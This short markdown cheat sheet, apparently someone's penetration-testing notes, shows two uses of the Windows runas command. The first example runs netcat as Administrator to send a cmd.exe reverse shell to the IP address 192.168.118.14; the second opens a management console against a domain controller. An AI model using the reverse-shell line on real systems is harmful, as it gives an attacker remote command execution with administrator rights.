# runas
- run command as another user -> will prompt for password
`runas /env /profile /user:DVR4\Administrator "C:\temp\nc.exe -e cmd.exe 192.168.118.14 443" `

- run command as a domain user -> will prompt for password
`runas /netonly /user:<domain name>\<domain username> "mmc /server=<domain controler>"`